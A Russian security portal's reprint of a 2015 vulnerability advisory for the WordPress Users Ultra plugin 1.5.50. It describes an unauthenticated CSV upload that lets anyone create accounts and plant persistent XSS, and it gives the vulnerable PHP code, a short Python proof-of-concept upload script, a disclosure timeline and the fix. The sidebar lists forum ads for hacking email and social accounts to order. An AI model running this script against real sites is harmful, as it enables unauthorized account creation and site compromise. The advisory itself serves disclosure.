Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Эксплойт (exploit) WordPress Users Ultra Plugin 1.5.50 - неконтролируемый File Upload Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

WordPress Users Ultra Plugin 1.5.50 - неконтролируемый File Upload

19.11.2015



* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
 
Description
================================================================================
 
WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
 
Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
 
Details
================================================================================
 
The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
 
1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
    ```php
    if (isset($_POST['uultra-form-cvs-form-conf'])) 
    {
        /* Let's Update the Profile */
        $this->process_cvs($_FILES);             
    }
    ```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
 
In addition we mark the following points:
 
1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
 
PoC
================================================================================
 
The following Python3 script forms a csv file and uploads it to a site
 
```python3
#!/usr/bin/python3
import requests
import csv
import tempfile
 
url = 'http://example.com/'
 
postData = {
    'uultra-form-cvs-form-conf': 1,
    'uultra-send-welcome-email': 1,
    'uultra-activate-account': 'pending'
}
 
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
 
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
 
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
 
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
 
csvFile.seek(0)
 
files = {'file.csv': csvFile}
 
r = requests.post(url, data=postData, files=files)
 
exit(0)
```
 
Timeline
================================================================================
 
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released
 
Solution
================================================================================
 
Update to version 1.5.59

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Unsorted
Опубликовал: DiMan
Просмотров: 4130
Проголосовало через SMS: 0
Ключевые слова: wordpress, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Разное » Как Создать или как открыть свой хайп сайт.
  • Взлом и безопасность / Фрикинг » Re: аппаратный кейлоггер
  • Взлом и безопасность / Разное » Услуги взлома социальных сетей от victor.uslugi.online@gmail
  • Разное / Болталка » Безлимитный вк везде
  • Взлом и безопасность / Разное » Верифицированные кошельки -купить 24/7
  • Администрирование / MAC » Актуальные объявления об аренде квартир
  • Взлом и безопасность / Разное » Качественный Взлом Вконтакте,Mail,Yandex,Rambler,Ukrnet
  • Интернет / Разное » Re: ВЗЛОМ: как взломать банковские счета и т.д.?
  • Взлом и безопасность / Разное » Re: [Взлом почты на заказ] Mail.Ru, Yandex.Ru, Rambler.Ru, U...
  • Разное / Предложения работы » Re: Взлом Хорошие цены, Через Гаранта!,Ok.ru,WhatsApp на зак...

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}